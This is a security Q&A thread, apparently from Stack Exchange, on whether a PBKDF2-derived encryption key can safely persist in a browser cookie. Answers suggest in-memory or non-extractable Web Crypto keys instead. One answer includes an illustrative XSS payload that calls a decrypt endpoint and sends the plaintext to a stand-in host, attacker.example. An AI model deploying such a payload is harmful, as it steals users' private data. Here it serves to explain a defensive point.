
I'm building a web application on the MERN stack that stores sensitive user data in the form of a large block of text.

The encryption method I am using works like this: when a user registers, a random key is generated (the generated key), and another key is derived from the user's password using PBKDF2 (the derived key). I use the derived key to encrypt the generated key and store the result (the encrypted key) in the database.

The sensitive data is encrypted/decrypted by pulling the encrypted key from the database and decrypting it using the derived key (remember, the derived key comes from the user's password and is not stored in the DB). This recovers the originally generated key, which is what we finally use to encrypt and decrypt the data.
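To make the flow concrete, here is a rough sketch of the wrap/unwrap steps using Node's built-in crypto module. The iteration count, key sizes and AES-256-GCM are illustrative choices for the sketch, not a vetted configuration:

```js
const crypto = require('crypto');

// Derive a 256-bit key from the user's password with PBKDF2.
function deriveKey(password, salt) {
  return crypto.pbkdf2Sync(password, salt, 600000, 32, 'sha256');
}

// On registration: generate a random data key and wrap (encrypt) it with the
// derived key. The salt, IV, auth tag and wrapped key go into the database.
function wrapDataKey(password) {
  const salt = crypto.randomBytes(16);
  const derivedKey = deriveKey(password, salt);
  const dataKey = crypto.randomBytes(32);          // the "generated key"
  const iv = crypto.randomBytes(12);
  const cipher = crypto.createCipheriv('aes-256-gcm', derivedKey, iv);
  const wrapped = Buffer.concat([cipher.update(dataKey), cipher.final()]);
  return { salt, iv, tag: cipher.getAuthTag(), wrapped };
}

// On login: rebuild the derived key from the password and unwrap the data key,
// which is then used to encrypt/decrypt the sensitive text.
function unwrapDataKey(password, { salt, iv, tag, wrapped }) {
  const derivedKey = deriveKey(password, salt);
  const decipher = crypto.createDecipheriv('aes-256-gcm', derivedKey, iv);
  decipher.setAuthTag(tag);
  return Buffer.concat([decipher.update(wrapped), decipher.final()]);
}
```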

The issue I'm running into now is that this is only secure if the user has to log in every time they open or refresh the page, since we need to prompt them for their password in order to get the derived key.

I'd like to add some convenience here: instead of making them log in every session, I want to persist the derived key somewhere in the browser.

I know localStorage is prone to XSS and cookies are prone to CSRF. I'm leaning towards keeping the derived key in an HttpOnly, SameSite=Strict cookie, which I think may be the best I can hope for in terms of security.
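For concreteness, this is roughly what I have in mind on the Express side (just a sketch; the route name and the placeholder value are made up):

```js
const express = require('express');
const app = express();

app.post('/login', (req, res) => {
  // ...verify the password and compute the PBKDF2-derived key here...
  const derivedKeyBase64 = '...'; // placeholder for the derived key

  res.cookie('derivedKey', derivedKeyBase64, {
    httpOnly: true,     // not readable from JavaScript
    sameSite: 'strict', // not sent on cross-site requests
    secure: true,       // only over HTTPS
  });
  res.sendStatus(204);
});
```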

Is this line of reasoning correct, or am I about to create some big vulnerability? If so, are there any recommendations, or do I just need to log them in every time they refresh the page?

2 Answers


There are several major issues with using cookies to store the derived key.

  • You cannot control how long the cookie will remain in the browser. If you use the Expires or Max-Age attribute, this only defines when the browser should stop sending the cookie. The exact time when the cookie will be removed is browser-specific. If you use a session cookie, it's completely up to the browser to decide when the “current session” ends.
  • Cookies can be read by anybody with physical access to the device, which is obviously a problem for shared devices. Unlike saved passwords, which can be protected with a master password, I believe there's currently no browser that lets you protect cookies in any way.
  • The users aren't aware of how critical their cookies are in your scheme. Even if you explain it to them, I'm not sure if they'll actually understand this and act accordingly (immediately clear the cookies by hand when they're done etc.).
  • Your scheme is highly vulnerable to XSS attacks. Using the HttpOnly cookie attribute only prevents the value from being read with JavaScript. The cookie is still automatically included in requests, so once an attacker has found an XSS vulnerability, they can automatically decrypt anything they want with the key stored in the cookie (see the sketch after this list).
  • Since the key is derived from the user's password, this means it's also possible to perform a brute-force attack against the password once the cookie value is known. PBKDF2 in particular is fairly weak, so this is a realistic attack scenario.
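To illustrate the XSS point: an injected script cannot read an HttpOnly cookie, but it doesn't need to, because the browser attaches the cookie to same-site requests anyway. A minimal sketch of such a payload (the endpoint and request body are hypothetical):

```js
// Hypothetical payload an attacker could run after finding an XSS hole.
// The /api/decrypt endpoint is made up for illustration.
fetch('/api/decrypt', {
  method: 'POST',
  credentials: 'include', // the HttpOnly "derivedKey" cookie rides along automatically
  headers: { 'Content-Type': 'application/json' },
  body: JSON.stringify({ docId: 'all' }),
})
  .then(r => r.json())
  .then(plaintext => {
    // exfiltrate the decrypted data to an attacker-controlled host
    navigator.sendBeacon('https://attacker.example/collect', JSON.stringify(plaintext));
  });
```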

A solution which is somewhat reasonable and still usable would be to turn the application, or at least the encryption-related part, into a single-page application, so that the key can be temporarily stored in a JavaScript variable. Of course, this restructuring can be a lot of effort. It also doesn't solve the problem of XSS, so you'll have to do additional work to prevent that as well (a very strict Content Security Policy, consistent use of Subresource Integrity, a review of all server-side measures).
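Roughly what that could look like with the Web Crypto API, keeping the key only in a variable for the lifetime of the page. The function names and parameters are illustrative; note that the unwrapped key can be created as non-extractable, so its raw bytes are never exposed to page scripts:

```js
// Sketch only: derive the key from the password, then unwrap the stored data
// key directly into a non-extractable CryptoKey held in memory.
let dataKey = null; // lives only as long as the page/tab

async function unlock(password, salt, wrappedKey, iv) {
  const material = await crypto.subtle.importKey(
    'raw', new TextEncoder().encode(password), 'PBKDF2', false, ['deriveKey']);

  const derivedKey = await crypto.subtle.deriveKey(
    { name: 'PBKDF2', salt, iterations: 600000, hash: 'SHA-256' },
    material, { name: 'AES-GCM', length: 256 }, false, ['unwrapKey']);

  // extractable: false, so the raw key bytes are never visible to JavaScript
  dataKey = await crypto.subtle.unwrapKey(
    'raw', wrappedKey, derivedKey, { name: 'AES-GCM', iv },
    { name: 'AES-GCM', length: 256 }, false, ['encrypt', 'decrypt']);
}

async function decryptBlob(iv, ciphertext) {
  if (!dataKey) throw new Error('Locked: prompt for the password first');
  return crypto.subtle.decrypt({ name: 'AES-GCM', iv }, dataKey, ciphertext);
}
```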

An even better solution would be a browser plugin which handles the encryption and key management without any server involvement. Of course that means you'll have to either find or develop an appropriate plugin, and your users have to be willing to install it. I remember a plugin for GPG (GNU Privacy Guard) which lets you encrypt and decrypt text in your browser, but I have no idea how secure the implementation actually is.

  • This would help with the first and last problem (undefined lifetime and brute-force attacks against the password). All other problems are still there. And the scheme is becoming more and more complex, which also increases the chance of security vulnerabilities. I'm really not sure if encryption is the right answer here, if the prerequisites for doing it properly aren't fulfilled. Commented Jun 14, 2023 at 4:48
  • Of course the session token will be affected by XSS attacks on any website, but in your case, we're talking about all encrypted data of all users that are victims of the attack. That's the difference: GitHub makes no claim about encrypting any data. If you do, then you'll have to deal with all problems that come with this extra feature. Commented Jun 14, 2023 at 5:20
  • OP, if you decide to store the private key in a JavaScript variable, then you might want to consider using a Web Crypto API CryptoKey object to store the key, with the extractable property set to false. This way, any other JavaScript that might be running (whether malicious or not) would be unable to access the key stored in the object. See crypto.stackexchange.com/questions/35530/… for more info. Commented Jun 22, 2023 at 16:18

You could save a non-extractable private key, created with WebCrypto, in IndexedDB. The key itself can't be extracted then; you can only use it for operations such as decryption.

See also: https://crypto.stackexchange.com/a/52488
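A rough sketch of that idea: CryptoKey objects are structured-cloneable, so they can be stored in IndexedDB as-is. The database and store names below are made up, and error handling is minimal:

```js
function openDb() {
  return new Promise((resolve, reject) => {
    const req = indexedDB.open('key-store', 1);
    req.onupgradeneeded = () => req.result.createObjectStore('keys');
    req.onsuccess = () => resolve(req.result);
    req.onerror = () => reject(req.error);
  });
}

async function saveKey(key) {
  const db = await openDb();
  await new Promise((resolve, reject) => {
    const tx = db.transaction('keys', 'readwrite');
    tx.objectStore('keys').put(key, 'dataKey'); // the CryptoKey object itself is stored
    tx.oncomplete = resolve;
    tx.onerror = () => reject(tx.error);
  });
}

async function loadKey() {
  const db = await openDb();
  return new Promise((resolve, reject) => {
    const req = db.transaction('keys').objectStore('keys').get('dataKey');
    req.onsuccess = () => resolve(req.result); // a usable, still non-extractable CryptoKey
    req.onerror = () => reject(req.error);
  });
}

// Usage (e.g. in an ES module, where top-level await is available):
const key = await crypto.subtle.generateKey(
  { name: 'AES-GCM', length: 256 }, false /* extractable */, ['encrypt', 'decrypt']);
await saveKey(key);
console.log(await loadKey());
```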

  • Your answer could be improved with additional supporting information. Please edit to add further details, such as citations or documentation, so that others can confirm that your answer is correct. You can find more information on how to write good answers in the help center. Commented Jun 22, 2023 at 9:29
  • Related: crypto.stackexchange.com/questions/35530/… Commented Jun 22, 2023 at 16:11
